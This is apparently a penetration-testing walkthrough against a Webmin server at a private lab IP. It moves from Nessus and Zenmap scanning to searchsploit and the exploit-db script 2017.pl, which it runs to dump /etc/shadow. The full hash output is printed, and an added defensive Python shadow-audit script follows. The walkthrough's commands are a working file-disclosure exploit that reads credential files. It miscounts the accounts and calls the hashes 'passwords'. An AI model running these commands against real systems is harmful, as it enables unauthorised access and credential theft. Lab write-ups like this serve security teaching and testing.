Information Gathering & Service Enumeration
The target is at IP 192.168.0.21.
Scanning is done using
Zenmap & Netifera
using zenmap
using netifera
Second step
Vulnerability Assessment
Using Nessus to scan the target 192.168.0.21 for vulnerabilities.
This is the result of the scan from Nessus. I got the same services and service ports.
From this result I picked one of the services, named www on port 10000, and clicked that service to learn about its vulnerabilities. We got the Webmin service.
Once all of the information has been gathered,
the last step is to exploit using exploitdb.
Last step
Exploit using exploitdb
Open exploitdb and search for vulnerabilities of the target. To search, type
./searchsploit webmin
This will list the exploits:
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
 Description                                                                Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
root@bt:/pentest/exploits/exploitdb#
We got results from exploitdb. Now, for the exploit, use
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
To explain why the Arbitrary File Disclosure Exploit is used instead of the BruteForce and Command Execution Exploit:
Arbitrary: reading files without control.
BruteForce: forced entry.
Now run the Arbitrary File Disclosure exploit by typing
perl platforms/multiple/remote/2017.pl
root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl
Usage: platforms/multiple/remote/2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
If it runs well, now run the exploit using the information above.
root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
-------------------------------------
From this information we have 4 identities with user and password:
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
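A defender's follow-up to the disclosed file above, as an added example that is not part of the original post: a small audit that reads shadow-format text and reports which accounts hold a usable password, which crypt scheme each one uses ($1$ is MD5-crypt, as in the dump above), and when it was last changed. The sample lines and the names classify and audit_shadow are constructed for illustration.

```python
from datetime import date, timedelta

# crypt(3) scheme ids; "$1$" (MD5-crypt) is the scheme in the dump above.
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
WEAK = {"empty", "md5crypt", "des-or-unknown"}

# Constructed sample in /etc/shadow format (hash values are placeholders).
SAMPLE = """\
root:$1$CONSTRCT$placeholderhashvalue00:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
alice:$6$CONSTRCT$placeholderhashvalue11:19000:0:99999:7:::
bob::14041:0:99999:7:::
"""

def classify(pw):
    """Map a shadow password field to a scheme name, or None if locked."""
    if pw == "":
        return "empty"            # no password required at all
    if pw[0] in "*!":
        return None               # locked or password login disabled
    parts = pw.split("$")
    if pw.startswith("$") and len(parts) >= 4:
        return SCHEMES.get(parts[1], "des-or-unknown")
    return "des-or-unknown"       # legacy DES crypt or unrecognised format

def audit_shadow(text):
    """Return a finding for every account whose password is usable."""
    findings = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 3 or not fields[0]:
            continue              # blank or malformed line
        scheme = classify(fields[1])
        if scheme is None:
            continue
        # Field 3 is the last password change, in days since 1970-01-01.
        changed = None
        if fields[2].isdigit():
            changed = (date(1970, 1, 1) + timedelta(days=int(fields[2]))).isoformat()
        findings.append({"user": fields[0], "scheme": scheme,
                         "weak": scheme in WEAK, "changed": changed})
    return findings

if __name__ == "__main__":
    for f in audit_shadow(SAMPLE):
        print(f)
```

Entries flagged weak are the ones to rehash with a stronger scheme or lock, since a disclosed shadow file exposes them to offline guessing.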
That's all for privilege escalation.
Have fun.